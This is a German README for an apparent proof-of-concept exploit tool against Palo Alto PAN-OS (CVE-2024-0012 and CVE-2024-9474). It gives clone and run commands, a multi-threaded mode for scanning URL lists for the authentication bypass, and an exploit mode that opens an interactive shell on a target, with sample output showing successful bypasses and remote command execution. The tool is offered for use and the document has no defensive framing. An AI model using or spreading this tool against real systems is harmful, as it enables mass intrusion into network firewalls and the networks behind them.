
Palo Alto RCE Sicherheitslücke
Dieses Skript ist ein Proof-of-Concept (PoC) Exploit für Schwachstellen in Palo Alto PAN-OS (CVE-2024-0012 & CVE-2024-9474). Das Skript kann entweder zum Scannen einer Liste von URLs auf die Schwachstelle oder zum interaktiven Ausnutzen einer einzelnen anfälligen URL verwendet werden.
git clone https://github.com/aratane/CVE-2024-9474
cd CVE-2024-9474
go mod tidy
github.com/cheggaaa/pb/v3: Fortschrittsbalken zur Anzeige des Scanstatus. github.com/gookit/color: Verbesserte Farbunterstützung für Konsolenausgaben. github.com/manifoldco/promptui: Interaktive Eingabeaufforderungen in der Befehlszeile. github.com/p0dalirius/goopts/parser: Analyse von Befehlszeilenargumenten.
Ausführen im Scan-Modus (zum Scannen mehrerer URLs) Der Scan-Modus wird verwendet, um mehrere URLs auf die Schwachstelle zu überprüfen. Sie müssen eine Datei mit einer Liste von URLs bereitstellen.
go run main.go --file urls.txt --output results.txt --threads 100
--file: Pfad zu einer Datei mit einer Liste der zu scannenden URLs. --output: Pfad zum Speichern der Scanergebnisse (Standard: output.txt). --threads: Anzahl gleichzeitiger Threads für den Scan (Standard: 200).
http://example1.com
http://example2.com
Ausführen im Exploit-Modus (zum interaktiven Ausnutzen einer einzelnen URL)
go run main.go --url http://target.com --output results.txt
--url: Die Ziel-URL, die ausgenutzt werden soll. --output: Pfad zum Speichern der Exploit-Ergebnisse. Sobald Sie sich im Exploit-Modus befinden, können Sie Befehle eingeben, die auf dem Zielsystem ausgeführt werden sollen. Geben Sie exit ein, um die interaktive Shell zu beenden.
Um Hilfeinformationen anzuzeigen:
go run main.go --help
Nach Abschluss des Scans werden die Ergebnisse in der angegebenen Ausgabedatei (z.B. results.txt) gespeichert:
[+] http://example1.com - Auth Bypass successful
[+] http://example2.com - Auth Bypass successful
Beim interaktiven Ausnutzen einer URL wird die Befehlsausgabe nach der Ausführung der Befehle auf dem Ziel angezeigt:
# ls /var
bin app lib tmp
# exit
[+] Exiting interactive shell.
Befehlszeilenargumente Flag Beschreibung Standardwert --url Die URL, die im Exploit-Modus ausgenutzt werden soll --file Datei mit zu scannenden URLs (im Scan-Modus verwendet) --output Ausgabedatei zum Speichern der Ergebnisse output.txt --threads Anzahl gleichzeitiger Threads für den Scan (Scan-Modus) 200 --help Hilfemeldung anzeigen
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die LICENSE-Datei für Details.